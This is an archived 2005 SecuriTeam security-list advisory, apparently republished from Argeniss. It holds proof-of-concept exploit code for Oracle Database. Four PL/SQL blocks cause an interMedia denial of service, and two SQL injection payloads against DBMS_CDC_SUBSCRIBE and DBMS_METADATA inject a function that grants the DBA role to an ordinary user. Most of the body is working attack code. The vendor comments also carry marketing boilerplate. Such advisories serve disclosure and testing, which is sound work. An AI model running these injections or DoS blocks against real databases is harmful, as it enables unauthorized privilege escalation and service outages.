Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)
Date: 21 Apr 2005 16:40:04 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, 
DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)
------------------------------------------------------------------------


SUMMARY

As we reported in our previous articles:  
<http://www.securiteam.com/securitynews/5YP0S0AFGK.html> Oracle interMedia 
DoS,  <http://www.securiteam.com/securitynews/5VP0P0AFGM.html> Multiple 
SQL Injection Vulnerabilities in DBMS_CDC_SUBSCRIBE and 
DBMS_CDC_ISUBSCRIBE Packages and  
<http://www.securiteam.com/securitynews/5UP0O0AFGO.html> Multiple SQL 
Injection Vulnerabilities in DBMS_METADATA Package, multiple 
vulnerabilities have been discovered in Oracle. The following exploit code 
can be used to test your Oracle installation for the mentioned 
vulnerabilities.

DETAILS

Exploit for Oracle interMedia DoS:
/*
   Argeniss - Information Security
   http://www.argeniss.com
   info>at<argeniss>dot<com

   You think you are secure because you are running the unbreakable 
Oracle, you think you are secure because you are up to date with patches, 
you think you are secure because etc., etc......
   You are wrong, Oracle software is so buggy that it can be owned in five 
seconds bypassing all protection mechanisms. Think how much money you will 
loose when your corporate data is compromised.
   There are still dozens of unpatched vulnerabilities. The best 
protection is eliminating vulnerabilities.
   Join AVI service now and be safe http://www.argeniss.com/services.html
   Find out the special offer for Oracle vulnerability pack, it includes 
all unpatched Oracle vulnerability information with workaround scripts 
ready to apply.

   Proof of concept exploit code for the Denial of Service vulnerability 
in Oracle InterMedia.
   http://www.argeniss.com/research.html
   By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

  These exploits makes the Oracle process to consume 100% CPU usage.
*/

-- Exploit 1: Explicitly setting two null bytes to localData property
DECLARE
  Image ORDSYS.ORDImage;
BEGIN
  Image := ORDSYS.ORDImage.init();
  Image.source.localData := TO_BLOB(HEXTORAW('0000'));
  Image.setProperties;
END;
/

-- Exploit 2: Loading from filesystem
DECLARE
  Image ORDSYS.ORDImage;
BEGIN
  Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR', 
'file_with_two_null_bytes.jpg');
  Image.setProperties;
END;
/

-- Exploit 3: Loading from web
DECLARE
  Image ORDSYS.ORDImage;
BEGIN
  Image := ORDSYS.ORDImage.init('HTTP', 'www.someserver.com/',
   'file_with_two_null_bytes.jpg');
  Image.setProperties;
END;
/


-- Exploit 4: Explicitly setting two null bytes to localData property of 
ORDDoc type.
DECLARE
  Doc ORDSYS.ORDDoc;
  R RAW(30000);
BEGIN
  Doc := ORDSYS.ORDDoc.init();
  Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
  Doc.setProperties (R, FALSE);
END;
/

Exploit for DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages:
/*
   Argeniss - Information Security
   http://www.argeniss.com
   info>at<argeniss>dot<com


   You think you are secure because you are running the unbreakable 
Oracle, you think you are secure because you are up to date with patches, 
you think you are secure because etc., etc......
   You are wrong, Oracle software is so buggy that it can be owned in five 
seconds bypassing all protection mechanisms. Think how much money you will 
loose when your corporate data is compromised.
   There are still dozens of unpatched vulnerabilities. The best 
protection is eliminating vulnerabilities.
   Join AVI service now and be safe http://www.argeniss.com/services.html
   Find out the special offer for Oracle vulnerability pack, it includes 
all unpatched Oracle vulnerability information with workaround scripts 
ready to apply.


   Proof of concept exploit code for the SQL Injection vulnerability in 
Oracle
   Database Server standard packages SYS.DBMS_CDC_SUBSCRIBE and
   SYS.DBMS_CDC_ISUBSCRIBE (parameter SUBSCRIPTION_NAME).
   http://www.argeniss.com/research.html
   By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

   This exploit grants the DBA role to the user SCOTT.
   Required privileges: Database user with privileges to create or modify 
functions.
   For more information on SQL injection issues in Oracle and how this 
exploit works
   see the Advanced SQL Injection in Oracle databases presentation 
available at
   http://www.argeniss.com/research.html
*/

-- First we create the function to be injected and executed as the SYS 
user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
 authid current_user as
 pragma autonomous_transaction;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
  COMMIT;
  RETURN '';
END;
/


-- Inject the function in the vulnerable procedure
BEGIN
  
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');
END;
/

Exploit for DBMS_METADATA package:
/*
   Argeniss - Information Security
   http://www.argeniss.com
   info>at<argeniss>dot<com

   You think you are secure because you are running the unbreakable 
Oracle, you think you are secure because you are up to date with patches, 
you think you are secure because etc., etc......
   You are wrong, Oracle software is so buggy that it can be owned in five 
seconds bypassing all protection mechanisms. Think how much money you will 
loose when your corporate data is compromised.
   There are still dozens of unpatched vulnerabilities. The best 
protection is eliminating vulnerabilities.
   Join AVI service now and be safe http://www.argeniss.com/services.html
   Find out the special offer for Oracle vulnerability pack, it includes 
all unpatched Oracle vulnerability information with workaround scripts 
ready to apply.


   Proof of concept exploit code for the SQL Injection vulnerability in 
Oracle
   Database Server standard package DBMS_METADATA.
   http://www.argeniss.com/research.html
   By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

   This exploit grants the DBA role to the user SCOTT.
   Required privileges: Database user with privileges to create or modify 
functions.
   For more information on SQL injection issues in Oracle and how this 
exploit works
   see the Advanced SQL Injection in Oracle databases presentation 
available at
   http://www.argeniss.com/research.html
*/

-- First we create the function to be injected and executed as the SYS 
user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
 authid current_user as
 pragma autonomous_transaction;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
  COMMIT;
  RETURN '';
END;
/


-- Inject the function in the vulnerable procedure
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACKER_FUNC()||''','') FROM 
dual;
/


ADDITIONAL INFORMATION

The information has been provided by  <mailto:cesarc56@yahoo.com> Cesar.
The original article can be found at:  
<http://www.argeniss.com/research.html> 
http://www.argeniss.com/research.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, DBMS_CDC_ISUBSCRIBE and DBMS_METADATA), SecuriTeam <=
Previous by Date:  [EXPL] Microsoft MSHTA Script Execution Vulnerability (PoC, MS05-016), SecuriTeam
Next by Date:  [NT] Windows File Selection May Lead to Command Execution, support
Previous by Thread:  [EXPL] Microsoft MSHTA Script Execution Vulnerability (PoC, MS05-016), SecuriTeam
Next by Thread:  [EXPL] Morpheus Information Discloser Exploit, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]